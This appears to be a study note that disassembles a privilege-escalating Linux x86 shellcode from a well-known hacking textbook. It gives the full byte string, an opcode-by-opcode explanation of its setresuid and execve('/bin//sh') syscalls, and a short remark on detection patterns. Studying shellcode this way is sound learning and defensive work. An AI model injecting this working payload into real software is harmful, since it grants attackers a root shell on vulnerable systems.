  1. /*register ids:
  2.   eax = 0 = 000
  3.   ecx = 1 = 001
  4.   edx = 2 = 010
  5.   ebx = 3 = 011
  6.   esp = 4 = 100
  7.   ebp = 5 = 101
  8.   esi = 6 = 110
  9.   edi = 7 = 111*/
  10.  
  11. shellcode: \x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80
  12.  
  13. from "Hacking - The Art of Exploitation", in source file "exploit_notesearch.c". This is used in a buffer overflow to spawn a shell.
  14.  
  15. OPCODE              MNEMO   SRC DEST        (32-bit i386 code, AT&T operand order: source first, destination second)
  16.  
  17. \x31 \xc0           XOR     %eax,   %eax        ;clear eax, ebx, ecx (edx is cleared by the CDQ below); these become the syscall arguments
  18. \x31 \xdb           XOR     %ebx,   %ebx
  19. \x31 \xc9           XOR     %ecx,   %ecx
  20. \x99                CDQ                         ;sign-extend %eax into %edx:%eax; eax is 0, so this zeroes edx (CWD is the 16-bit form of the same opcode)
  21. \xb0 \xa4           MOV     $0xa4,  %al         ;eax = 0xa4 = 164, the syscall number (upper bytes of eax are already zero)
  22. \xcd \x80           INT     $0x80           ;Linux 32-bit syscall gate: eax=164 is setresuid, called with ebx=ecx=edx=0
  23. \x6a \x0b           PUSH    $0xb            ;push imm8 0xb, sign-extended to a 32-bit dword on the stack
  24. \x58                POP     %eax            ;eax = 0xb = 11, the syscall number for execve (opcode 58+r, r->register id)
  25. \x51                PUSH    %ecx            ;ecx is 0, so this pushes the NUL terminator for the string built next (opcode 50+r)
  26. \x68 \x2f \x2f \x73 \x68    PUSH    $0x68732f2f     ;32-bit immediate; bytes are "//sh" (little-endian)
  27. \x68 \x2f \x62 \x69 \x6e    PUSH    $0x6e69622f     ;bytes are "/bin"; the stack now holds "/bin//sh\0"
  28. \x89 \xe3           MOV     %esp,   %ebx        ;ebx = esp -> pointer to "/bin//sh" (ModRM 0xe3: reg=esp is the source, rm=ebx the destination)
  29. \x51                PUSH    %ecx            ;push a NULL dword (ecx is still 0)
  30. \x89 \xe2           MOV     %esp,   %edx        ;edx = esp -> points at the NULL, i.e. envp = {NULL}
  31. \x53                PUSH    %ebx            ;push the pointer to "/bin//sh"
  32. \x89 \xe1           MOV     %esp,   %ecx        ;ecx = esp -> argv = {"/bin//sh", NULL}
  33. \xcd \x80           INT     $0x80           ;syscall again: eax=11 -> execve(ebx="/bin//sh", ecx=argv, edx=envp)
  34.  
  35. //still don't know what the fuck this does
  36. // Net effect of the two syscalls: setresuid(0,0,0) followed by execve("/bin//sh", {"/bin//sh", NULL}, {NULL}). For detection purposes the recognisable parts are the "/bin//sh" string pushed as two immediates and the \xcd\x80 syscall pairs preceded by eax=0xa4 / eax=0xb.